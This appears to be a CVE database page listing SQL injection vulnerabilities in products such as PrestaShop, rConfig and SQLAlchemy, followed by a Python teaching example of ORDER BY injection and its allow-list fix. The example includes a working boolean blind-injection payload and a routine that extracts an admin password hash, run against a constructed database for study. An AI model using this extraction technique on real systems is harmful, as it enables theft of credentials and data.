Total: 11593 CVE
| CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 |
|---|---|---|---|---|---|
| CVE-2021-42131 | 1 Ivanti | 1 Avalanche | 2021-12-08 | 6.5 MEDIUM | 8.8 HIGH |
| A SQL injection vulnerability exists in Ivanti Avalanche before 6.3.3 that allows an attacker with access to the Inforail Service to perform privilege escalation. | |||||
| CVE-2021-43789 | 1 Prestashop | 1 Prestashop | 2021-12-08 | 7.5 HIGH | 9.8 CRITICAL |
| PrestaShop is an Open Source e-commerce web application. Versions of PrestaShop prior to 1.7.8.2 are vulnerable to blind SQL injection using search filters with `orderBy` and `sortOrder` parameters. The problem is fixed in version 1.7.8.2. | |||||
| CVE-2021-24943 | 1 Roundupwp | 1 Registrations For The Events Calendar | 2021-12-07 | 7.5 HIGH | 9.8 CRITICAL |
| The Registrations for the Events Calendar WordPress plugin before 2.7.6 does not sanitise and escape the event_id in the rtec_send_unregister_link AJAX action (available to both unauthenticated and authenticated users) before using it in a SQL statement, leading to an unauthenticated SQL injection. | |||||
| CVE-2021-31632 | 1 B2evolution | 1 B2evolution Cms | 2021-12-07 | 7.5 HIGH | 9.8 CRITICAL |
| b2evolution CMS v7.2.3 was discovered to contain a SQL injection vulnerability via the parameter cfqueryparam in the User login section. This vulnerability allows attackers to execute arbitrary code via a crafted input. | |||||
| CVE-2021-24866 | 1 Wpdataaccess | 1 Wp Data Access | 2021-12-07 | 7.5 HIGH | 9.8 CRITICAL |
| The WP Data Access WordPress plugin before 5.0.0 does not properly sanitise and escape the backup_date parameter before using it in a SQL statement, leading to a SQL injection issue that could allow arbitrary table deletion. | |||||
| CVE-2021-40313 | 1 Piwigo | 1 Piwigo | 2021-12-07 | 6.5 MEDIUM | 8.8 HIGH |
| Piwigo v11.5 was discovered to contain a SQL injection vulnerability via the parameter pwg_token in /admin/batch_manager_global.php. | |||||
| CVE-2021-44348 | 1 Yejiao | 1 Tuzicms | 2021-12-06 | 7.5 HIGH | 9.8 CRITICAL |
| SQL Injection vulnerability exists in TuziCMS v2.0.6 via the id parameter in App\Manage\Controller\AdvertController.class.php. | |||||
| CVE-2021-35414 | 1 Chamilo | 1 Chamilo Lms | 2021-12-06 | 7.5 HIGH | 9.8 CRITICAL |
| Chamilo LMS v1.11.x was discovered to contain a SQL injection via the doc parameter in main/plagiarism/compilatio/upload.php. | |||||
| CVE-2021-44349 | 1 Yejiao | 1 Tuzicms | 2021-12-06 | 7.5 HIGH | 9.8 CRITICAL |
| SQL Injection vulnerability exists in TuziCMS v2.0.6 via the id parameter in App\Manage\Controller\DownloadController.class.php. | |||||
| CVE-2020-10549 | 1 Rconfig | 1 Rconfig | 2021-12-06 | 7.5 HIGH | 9.8 CRITICAL |
| rConfig 3.9.4 and previous versions have an unauthenticated snippets.inc.php SQL injection. Because, by default, nodes' passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices. | |||||
| CVE-2020-10548 | 1 Rconfig | 1 Rconfig | 2021-12-06 | 7.5 HIGH | 9.8 CRITICAL |
| rConfig 3.9.4 and previous versions have an unauthenticated devices.inc.php SQL injection. Because, by default, nodes' passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices. | |||||
| CVE-2021-44050 | 2 Broadcom, Microsoft | 4 Ca Network Flow Analysis, Windows Server 2012, Windows Server 2016 and 1 more | 2021-12-06 | 4.0 MEDIUM | 6.5 MEDIUM |
| CA Network Flow Analysis (NFA) 21.2.1 and earlier contain a SQL injection vulnerability in the NFA web application, due to insufficient input validation, that could potentially allow an authenticated user to access sensitive data. | |||||
| CVE-2020-10547 | 1 Rconfig | 1 Rconfig | 2021-12-06 | 7.5 HIGH | 9.8 CRITICAL |
| rConfig 3.9.4 and previous versions have an unauthenticated compliancepolicyelements.inc.php SQL injection. Because, by default, nodes' passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices. | |||||
| CVE-2021-44347 | 1 Yejiao | 1 Tuzicms | 2021-12-06 | 7.5 HIGH | 9.8 CRITICAL |
| SQL Injection vulnerability exists in TuziCMS v2.0.6 in App\Manage\Controller\GuestbookController.class.php. | |||||
| CVE-2021-41746 | 1 Yonyou | 1 Turbocrm | 2021-12-06 | 5.0 MEDIUM | 7.5 HIGH |
| SQL Injection vulnerability exists in all versions of Yonyou TurboCRM via the orgcode parameter in changepswd.php. Attackers can use the vulnerability to obtain sensitive database information. | |||||
| CVE-2020-10546 | 1 Rconfig | 1 Rconfig | 2021-12-06 | 7.5 HIGH | 9.8 CRITICAL |
| rConfig 3.9.4 and previous versions have an unauthenticated compliancepolicies.inc.php SQL injection. Because, by default, nodes' passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices. | |||||
| CVE-2021-25784 | 1 Taogogo | 1 Taocms | 2021-12-04 | 6.5 MEDIUM | 7.2 HIGH |
| Taocms v2.5Beta5 was discovered to contain a blind SQL injection vulnerability via the function Edit Article. | |||||
| CVE-2021-25783 | 1 Taogogo | 1 Taocms | 2021-12-04 | 6.5 MEDIUM | 7.2 HIGH |
| Taocms v2.5Beta5 was discovered to contain a blind SQL injection vulnerability via the function Article Search. | |||||
| CVE-2019-7164 | 5 Debian, Opensuse, Oracle and 2 more | 9 Debian Linux, Backports Sle, Leap and 6 more | 2021-12-03 | 7.5 HIGH | 9.8 CRITICAL |
| SQLAlchemy through 1.2.17 and 1.3.x through 1.3.0b2 allows SQL Injection via the order_by parameter. | |||||
| CVE-2021-43679 | 1 Shopex | 1 Ecshop | 2021-12-03 | 7.5 HIGH | 9.8 CRITICAL |
| ecshop v2.7.3 is affected by a SQL injection vulnerability in shopex\ecshop\upload\api\client\api.php. | |||||
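The entries above keep describing two variants of the same defect: a request value concatenated into a SQL statement (CVE-2021-24943, CVE-2021-24866, the rConfig entries) and a sort parameter such as `orderBy`/`sortOrder` or `order_by` that lands in an ORDER BY clause (CVE-2021-43789, CVE-2019-7164). The block below is an added example written for this page in Python with the standard-library sqlite3 module; it is not code from any of the listed products, and the `products`/`users` tables, their rows and the function names are constructed for illustration. It shows why a bound placeholder protects the WHERE clause but cannot protect ORDER BY (placeholders bind values, not identifiers), how the unprotected sort column becomes a boolean oracle that reads another table one character at a time (the "blind" technique named in the PrestaShop entry), and how an identifier allow-list closes the hole.

```python
import sqlite3

# Identifier allow-lists: the only safe way to let a client choose a sort
# column or direction, since placeholders cannot bind identifiers or keywords.
ALLOWED_ORDER_BY = {"name": "name", "price": "price", "created": "created_at"}
ALLOWED_SORT_ORDER = {"asc": "ASC", "desc": "DESC"}


def make_db():
    """Constructed sample schema and rows (not taken from any real product)."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT, price REAL, created_at TEXT);
        CREATE TABLE users(id INTEGER PRIMARY KEY, login TEXT, password_hash TEXT);
        INSERT INTO products VALUES (1, 'apple', 1.0, '2021-01-01'),
                                    (2, 'pear',  2.0, '2021-02-01'),
                                    (3, 'plum',  3.0, '2021-03-01');
        INSERT INTO users VALUES (1, 'admin', 's3cr3t-hash');
        """
    )
    return con


def search_vulnerable(con, term, order_by, sort_order):
    """The orderBy/sortOrder pattern: the search term is bound, but the sort
    column and direction are interpolated because ORDER BY cannot take a
    bound parameter as an identifier. Returns product names in result order."""
    sql = f"SELECT name FROM products WHERE name LIKE ? ORDER BY {order_by} {sort_order}"
    return [row[0] for row in con.execute(sql, (f"%{term}%",))]


def search_hardened(con, term, order_by, sort_order):
    """Same query with the client-chosen identifiers mapped through an
    allow-list; anything not in the map is rejected before it reaches SQL."""
    column = ALLOWED_ORDER_BY.get(order_by)
    direction = ALLOWED_SORT_ORDER.get(str(sort_order).lower())
    if column is None or direction is None:
        raise ValueError("unknown orderBy/sortOrder value")
    sql = f"SELECT name FROM products WHERE name LIKE ? ORDER BY {column} {direction}"
    return [row[0] for row in con.execute(sql, (f"%{term}%",))]


def blind_oracle(con, condition):
    """Attacker side: an ORDER BY expression whose sort key depends on
    `condition`. The response leaks one bit: 'apple' first means the
    condition held (sorted by id), 'plum' first means it did not (sorted by -id)."""
    payload = f"(CASE WHEN ({condition}) THEN id ELSE -id END)"
    return search_vulnerable(con, "", payload, "")[0] == "apple"


def exfiltrate_admin_hash(con, max_len=32):
    """Boolean-based blind extraction of users.password_hash, one character per
    position, using only the oracle above; the query itself never returns it.
    Stops when no printable character matches (substr past the end gives ''
    and unicode('') is NULL, so the comparison is never true)."""
    recovered = ""
    subq = "(SELECT password_hash FROM users WHERE login = 'admin')"
    for pos in range(1, max_len + 1):
        for code in range(32, 127):
            if blind_oracle(con, f"unicode(substr({subq}, {pos}, 1)) = {code}"):
                recovered += chr(code)
                break
        else:
            break
    return recovered


if __name__ == "__main__":
    db = make_db()
    # Bound parameter: the classic quote break-out in the WHERE clause goes nowhere.
    print(search_vulnerable(db, "' OR 1=1 --", "name", "ASC"))
    # Unbound ORDER BY: the same endpoint reads a different table.
    print(exfiltrate_admin_hash(db))
    try:
        search_hardened(db, "", "(CASE WHEN 1=1 THEN id ELSE -id END)", "")
    except ValueError as exc:
        print("hardened version rejected the payload:", exc)
```

The point a reviewer should take from this: prepared statements are necessary but not sufficient. Any fragment of SQL that a client chooses and that is not a value (column names, sort direction, table names, LIMIT expressions in some engines) has to be mapped through an allow-list, which is also what makes the hardened version reject the CASE payload outright instead of trying to escape it.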
